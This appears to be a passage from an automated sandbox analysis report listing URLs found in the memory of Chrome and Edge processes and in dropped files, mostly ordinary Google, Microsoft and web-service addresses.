Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/&
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/(
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/)
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/0
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2
Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/3
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/9
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/:
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/=
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: msedge.exe, 00000015.00000002.2988279016.000002E400398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2cc80dabc69f58b6_1.23.dr	String found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.23.dr	String found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: aieukn.13.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000011.00000003.2820036525.0000259801D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000011.00000003.2820036525.0000259801D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000011.00000003.2820036525.0000259801D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard%
Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000011.00000003.2814373758.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808332227.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808790576.0000259801424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808917731.000025980142C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808998412.0000259801434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000011.00000003.2778674442.0000513400878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://m.kugou.com/
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://m.soundcloud.com/
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://m.vk.com/
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000011.00000003.2814373758.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808332227.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808790576.0000259801424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808917731.000025980142C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808998412.0000259801434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: msedge.exe, 00000015.00000002.2988279016.000002E400398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.cn/
Source: msedge.exe, 00000015.00000002.2988279016.000002E400398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/
Source: Cookies.24.dr	String found in binary or memory: https://msn.comXID/
Source: Cookies.24.dr	String found in binary or memory: https://msn.comXIDv100o
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://music.amazon.com
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://music.apple.com
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://music.yandex.com
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: 2cc80dabc69f58b6_1.23.dr	String found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 000003.log3.23.dr, 2cc80dabc69f58b6_0.23.dr	String found in binary or memory: https://ntp.msn.com
Source: 000003.log9.23.dr, 000003.log0.23.dr	String found in binary or memory: https://ntp.msn.com/
Source: 000003.log9.23.dr	String found in binary or memory: https://ntp.msn.com/0
Source: 2cc80dabc69f58b6_1.23.dr, 000003.log9.23.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 000003.log9.23.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: 2cc80dabc69f58b6_0.23.dr	String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: msedge.exe, 00000015.00000002.2988279016.000002E400398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.net/
Source: chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000011.00000003.2814485401.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://open.spotify.com
Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000011.00000003.2791223886.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://outlook.live.com/mail/0/
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://outlook.office.com/mail/0/
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/OAuthLogin0
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
Source: chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chromecache_473.19.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_473.19.dr	String found in binary or memory: https://plus.googleapis.com
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: 2cc80dabc69f58b6_1.23.dr	String found in binary or memory: https://sb.scorecardresearch.com/
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: 2cc80dabc69f58b6_1.23.dr	String found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.23.dr	String found in binary or memory: https://srtb.msn.com/
Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000011.00000003.2814373758.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808332227.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808790576.0000259801424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808917731.000025980142C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808998412.0000259801434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://tidal.com/
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://twitter.com/
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://vibe.naver.com/today
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://web.telegram.org/
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://web.whatsapp.com
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: chromecache_473.19.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: aieukn.13.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: Cleveland.9.dr, Evans.com.2.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: aieukn.13.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.deezer.com/
Source: lxlxt0.13.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Cleveland.9.dr, Evans.com.2.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000011.00000003.2787695410.0000259800CC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: content.js.23.dr, content_new.js.23.dr	String found in binary or memory: https://www.google.com/chrome
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
